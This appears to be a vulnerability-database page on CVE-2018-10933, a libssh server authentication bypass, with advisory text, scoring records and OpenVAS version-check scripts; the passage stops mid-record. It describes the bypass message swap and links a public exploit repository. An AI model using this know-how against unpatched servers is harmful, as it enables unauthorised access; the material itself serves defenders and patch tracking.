libssh is a C library implementing the SSHv2 protocol.
Problem
A vulnerability in libssh allows remote users to bypass authentication by sending a **SSH2_MSG_USERAUTH_SUCCESS** message instead of a **SSH2_MSG_USERAUTH_REQUEST** message.
Resolution
Upgrade to libssh 0.7.6 or 0.8.4 or higher, or install a fix from your operating system vendor.
{"attackerkb": [{"lastseen": "2020-11-18T06:45:09", "bulletinFamily": "info", "cvelist": ["CVE-2018-10933"], "description": "## Description\n\nlibssh versions 0.6 and above have an authentication bypass vulnerability in \nthe server code. By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message \nin place of the SSH2_MSG_USERAUTH_REQUEST message which the server would expect \nto initiate authentication, the attacker could successfully authenticate without any credentials.\n\n## Patch Availability\n\nPatches addressing the issue have been posted to: \n<https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/> \nlibssh version 0.8.4 and libssh 0.7.6 have been released to address this issue.\n\n## Workaround\n\nThere is no workaround for this issue.\n\n## Credit\n\nThe bug was discovered by Peter Winter-Smith of NCC Group. \nPatches are provided by the Anderson Toshiyuki Sasaki of Red Hat and the libssh team.\n\n \n**Recent assessments:** \n \n**xFreed0m** at March 13, 2020 9:49am UTC reported:\n\nLibSSH isn\u2019t common as other SSH server softwares and vulnerability is pretty dates so finding this in the wild won\u2019t be a walk in the park. \nHaving said that, if adversaries will find this software installed with a vulnerable version, exploitation is extremely easy (multiple exploit exists in the internet) and usually will provided access from the external to the server while fully bypassing the authentication. \nfor example \u2013 <https://github.com/xFreed0m/CVE-2018-10933>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5\n", "modified": "2020-03-13T00:00:00", "published": "2020-03-13T00:00:00", "id": "AKB:4F7350AE-EF50-4C10-AA45-8F473F230F89", "href": "https://attackerkb.com/topics/tp18ZUYA6a/cve-2018-10933", "type": "attackerkb", "title": "CVE-2018-10933", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "cve": [{"lastseen": "2021-02-02T06:52:24", "description": "A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-10-17T12:29:00", "title": "CVE-2018-10933", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10933"], "modified": "2019-10-09T23:33:00", "cpe": ["cpe:/a:netapp:oncommand_workflow_automation:-", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:netapp:oncommand_unified_manager:*", "cpe:/a:oracle:mysql_workbench:8.0.13", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:18.10", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:netapp:snapcenter:-", "cpe:/a:netapp:storage_automation_store:-", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-10933", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10933", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:vsphere:*:*", "cpe:2.3:a:oracle:mysql_workbench:8.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_unified_manager:*:*:*:*:*:windows:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:39:47", "bulletinFamily": "software", "cvelist": ["CVE-2018-10933"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-10-26T03:44:00", "published": "2018-10-18T21:15:00", "id": "F5:K52868493", "href": "https://support.f5.com/csp/article/K52868493", "title": "libssh vulnerability CVE-2018-10933", "type": "f5", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:33:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "description": "The remote SSH server is using libssh which is prone to an authentication bypass vulnerability.", "modified": "2018-10-23T00:00:00", "published": "2018-10-17T00:00:00", "id": "OPENVAS:1361412562310108473", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108473", "type": "openvas", "title": "libssh Server 'CVE-2018-10933' Authentication Bypass", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_libssh_userauth_access_bypass.nasl 12033 2018-10-23 11:14:43Z asteins $\n#\n# libssh Server 'CVE-2018-10933' Authentication Bypass\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:libssh:libssh\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108473\");\n script_version(\"$Revision: 12033 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-23 13:14:43 +0200 (Tue, 23 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-17 08:58:02 +0200 (Wed, 17 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_cve_id(\"CVE-2018-10933\");\n script_name(\"libssh Server 'CVE-2018-10933' Authentication Bypass\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_libssh_server_detect.nasl\");\n script_mandatory_keys(\"libssh/server/detected\");\n\n script_xref(name:\"URL\", value:\"https://www.libssh.org/security/advisories/CVE-2018-10933.txt\");\n\n script_tag(name:\"summary\", value:\"The remote SSH server is using libssh which is prone to an authentication bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"By presenting the server an SSH2_MSG_USERAUTH_SUCCESS message in place of the\n SSH2_MSG_USERAUTH_REQUEST message which the server would expect to initiate authentication the server is authentciating\n users without any credentials.\n\n NOTE: Some server implementations using libssh (e.g. Github Enterprise) are not affected by this issue.\");\n\n script_tag(name:\"impact\", value:\"An attacker could successfully authentciate without any credentials.\");\n\n script_tag(name:\"affected\", value:\"libssh versions starting from 0.6 and prior to 0.7.6/0.8.4.\");\n\n script_tag(name:\"solution\", value:\"Update to libssh version 0.7.6, 0.8.4 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_in_range( version:vers, test_version:\"0.6\", test_version2:\"0.7.5\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"0.7.6\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nif( version_in_range( version:vers, test_version:\"0.8\", test_version2:\"0.8.3\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"0.8.4\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-27T18:38:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192067", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192067", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for libssh (EulerOS-SA-2019-2067)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2067\");\n script_version(\"2020-01-23T12:33:02+0000\");\n script_cve_id(\"CVE-2018-10933\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:33:02 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:33:02 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libssh (EulerOS-SA-2019-2067)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2067\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2067\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libssh' package(s) announced via the EulerOS-SA-2019-2067 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access.(CVE-2018-10933)\");\n\n script_tag(name:\"affected\", value:\"'libssh' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh\", rpm:\"libssh~0.7.1~2.h2\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-31T17:36:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-10-20T00:00:00", "id": "OPENVAS:1361412562310851943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851943", "type": "openvas", "title": "openSUSE: Security Advisory for libssh (openSUSE-SU-2018:3245-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851943\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-20 07:33:44 +0200 (Sat, 20 Oct 2018)\");\n script_cve_id(\"CVE-2018-10933\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for libssh (openSUSE-SU-2018:3245-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libssh'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for libssh fixes the following security issue:\n\n - CVE-2018-10933: Fixed a server mode authentication bypass (boo#1108020).\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-1207=1\");\n\n script_tag(name:\"affected\", value:\"libssh on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3245-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00042.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libssh-debugsource\", rpm:\"libssh-debugsource~0.6.3~17.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh-devel\", rpm:\"libssh-devel~0.6.3~17.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh-devel-doc\", rpm:\"libssh-devel-doc~0.6.3~17.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh4\", rpm:\"libssh4~0.6.3~17.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh4-debuginfo\", rpm:\"libssh4-debuginfo~0.6.3~17.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh4-32bit\", rpm:\"libssh4-32bit~0.6.3~17.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libssh4-debuginfo-32bit\", rpm:\"libssh4-debuginfo-32bit~0.6.3~17.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-07-04T18:55:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "description": "Peter Winter-Smith of NCC Group discovered that libssh, a tiny C SSH\nlibrary, contains an authentication bypass vulnerability in the server\ncode. An attacker can take advantage of this flaw to successfully\nauthenticate without any credentials by presenting the server an\nSSH2_MSG_USERAUTH_SUCCESS message in place of the\nSSH2_MSG_USERAUTH_REQUEST message which the server would expect to\ninitiate authentication.", "modified": "2019-07-04T00:00:00", "published": "2018-10-17T00:00:00", "id": "OPENVAS:1361412562310704322", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704322", "type": "openvas", "title": "Debian Security Advisory DSA 4322-1 (libssh - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4322-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704322\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-10933\");\n script_name(\"Debian Security Advisory DSA 4322-1 (libssh - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-17 00:00:00 +0200 (Wed, 17 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4322.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"libssh on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 0.7.3-2+deb9u1.\n\nWe recommend that you upgrade your libssh packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/libssh\");\n script_tag(name:\"summary\", value:\"Peter Winter-Smith of NCC Group discovered that libssh, a tiny C SSH\nlibrary, contains an authentication bypass vulnerability in the server\ncode. An attacker can take advantage of this flaw to successfully\nauthenticate without any credentials by presenting the server an\nSSH2_MSG_USERAUTH_SUCCESS message in place of the\nSSH2_MSG_USERAUTH_REQUEST message which the server would expect to\ninitiate authentication.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libssh-4\", ver:\"0.7.3-2+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libssh-dev\", ver:\"0.7.3-2+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libssh-doc\", ver:\"0.7.3-2+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libssh-gcrypt-4\", ver:\"0.7.3-2+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libssh-gcrypt-dev\", ver:\"0.7.3-2+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:33:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310843708", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843708", "type": "openvas", "title": "Ubuntu Update for libssh USN-3795-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3795_2.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for libssh USN-3795-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843708\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2018-10933\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:09:09 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"Ubuntu Update for libssh USN-3795-2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.10\");\n\n script_xref(name:\"USN\", value:\"3795-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3795-2/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libssh'\n package(s) announced via the USN-3795-2 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"USN-3795-1 fixed a vulnerability in libssh. This update provides the\ncorresponding update for Ubuntu 18.10.\n\nOriginal advisory details:\n\nPeter Winter-Smith discovered that libssh incorrectly handled\nauthentication when being used as a server. A remote attacker could use\nthis issue to bypass authentication without any credentials.\");\n\n script_tag(name:\"affected\", value:\"libssh on Ubuntu 18.10.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU18.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssh-4\", ver:\"0.8.1-1ubuntu0.1\", rls:\"UBUNTU18.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-01-31T17:38:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10933"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310852004", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852004", "type": "openvas", "title": "openSUSE: Security Advisory for libssh (openSUSE-SU-2018:3200-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852004\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-10933\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:33:45 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for libssh (openSUSE-SU-2018:3200-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3200-1\");\n script_xref(name:\"URL\", 